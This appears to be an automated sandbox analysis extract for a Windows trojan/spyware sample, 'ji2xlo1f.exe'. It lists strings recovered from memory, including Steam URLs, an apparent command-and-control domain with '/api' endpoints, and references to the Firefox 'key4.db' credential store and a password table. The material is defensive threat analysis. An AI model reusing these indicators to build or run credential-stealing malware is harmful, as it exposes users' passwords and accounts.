Source: ji2xlo1f.exe, 00000001.00000003.2242729272.00000000016A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
Source: ji2xlo1f.exe, 00000001.00000003.2308942550.0000000003D5C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: ji2xlo1f.exe, 00000001.00000003.2308942550.0000000003D5C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: ji2xlo1f.exe, 00000001.00000003.2242729272.00000000016A0000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://checkout.steampowered.com/
Source: ji2xlo1f.exe, 00000001.00000003.2242729272.00000000016A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280774238.0000000001652000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280774238.0000000001652000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2483484833.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2457835419.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2308329665.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280774238.0000000001652000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2458528884.00000000016E7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2446810949.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280774238.0000000001652000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280774238.0000000001652000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=THDq-gsQ
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280774238.0000000001652000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=0Xxx
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=kOc26QwM0vlX&l=e
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                Source: ji2xlo1f.exe, 00000001.00000003.2445952124.0000000003D1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
                Source: ji2xlo1f.exe, 00000001.00000003.2445952124.0000000003D1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: ji2xlo1f.exe, 00000001.00000003.2308942550.0000000003D5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: ji2xlo1f.exe, 00000001.00000003.2308942550.0000000003D5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: ji2xlo1f.exe, 00000001.00000003.2308942550.0000000003D5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                Source: ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                Source: ji2xlo1f.exe, 00000001.00000003.2445952124.0000000003D1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                Source: ji2xlo1f.exe, 00000001.00000003.2280774238.0000000001695000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2491194547.0000000003D1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/
                Source: ji2xlo1f.exe, 00000001.00000003.2413647159.0000000003D1B000.00000004.00000800.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2457586316.0000000003D1B000.00000004.00000800.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2446024458.0000000003D1B000.00000004.00000800.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2412079508.0000000003D17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/%
                Source: ji2xlo1f.exe, 00000001.00000003.2242729272.00000000016A0000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280774238.0000000001695000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/A
                Source: ji2xlo1f.exe, 00000001.00000003.2506963341.00000000016F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/Akys
                Source: ji2xlo1f.exe, 00000001.00000003.2507134468.0000000003D17000.00000004.00000800.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2457586316.0000000003D1B000.00000004.00000800.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2446024458.0000000003D1B000.00000004.00000800.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000002.2585645002.0000000003D1B000.00000004.00000800.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2492449171.0000000003D1B000.00000004.00000800.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2491194547.0000000003D1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/I
                Source: ji2xlo1f.exe, 00000001.00000003.2242729272.00000000016A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/a
                Source: ji2xlo1f.exe, ji2xlo1f.exe, 00000001.00000002.2584910256.00000000016E5000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000002.2584910256.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2458550592.000000000169A000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2446810949.000000000169A000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2483549945.000000000169A000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242729272.00000000016A0000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2507093985.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2483549945.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2446810949.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2571494048.00000000016E5000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2571541795.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280774238.0000000001695000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api
                Source: ji2xlo1f.exe, 00000001.00000003.2368050415.0000000003D20000.00000004.00000800.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2368098826.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2368278967.0000000003D34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api0JBb
                Source: ji2xlo1f.exe, 00000001.00000002.2585241320.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2506963341.00000000016F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apiN#
                Source: ji2xlo1f.exe, 00000001.00000002.2584910256.00000000016E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apiic
                Source: ji2xlo1f.exe, 00000001.00000003.2446810949.000000000169A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apijson
                Source: ji2xlo1f.exe, 00000001.00000003.2483549945.00000000016D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apim
                Source: ji2xlo1f.exe, 00000001.00000003.2483549945.00000000016D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apix
                Source: ji2xlo1f.exe, 00000001.00000003.2446810949.00000000016D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/e
                Source: ji2xlo1f.exe, 00000001.00000002.2585241320.00000000016EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/n#
                Source: ji2xlo1f.exe, 00000001.00000003.2491396441.00000000016F6000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2506963341.00000000016F6000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242729272.00000000016A0000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2483290597.00000000016F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi
                Source: ji2xlo1f.exe, 00000001.00000003.2446810949.00000000016D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/qWU0rNf#
                Source: ji2xlo1f.exe, 00000001.00000003.2491396441.00000000016F6000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2483290597.00000000016F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/r
                Source: ji2xlo1f.exe, 00000001.00000002.2585241320.00000000016EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/rsF#
                Source: ji2xlo1f.exe, 00000001.00000002.2585241320.00000000016EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/v#
                Source: ji2xlo1f.exeString found in binary or memory: https://lev-tolstoi.com:443/api
                Source: ji2xlo1f.exe, 00000001.00000002.2584910256.0000000001672000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/api2
                Source: ji2xlo1f.exe, 00000001.00000003.2571494048.00000000016E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/api7hffxt.default-release/key4.dbPK
Source: ji2xlo1f.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@11/2
Source: C:\Users\user\Desktop\ji2xlo1f.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: ji2xlo1f.exe, 00000001.00000003.2368842615.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2368718398.0000000003D47000.00000004.00000800.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2309065675.0000000003D2B000.00000004.00000800.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2308752580.0000000003D49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: ji2xlo1f.exe | ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File read: C:\Users\user\Desktop\ji2xlo1f.exe
Source: C:\Users\user\Desktop\ji2xlo1f.exe | Section loaded: apphelp.dll
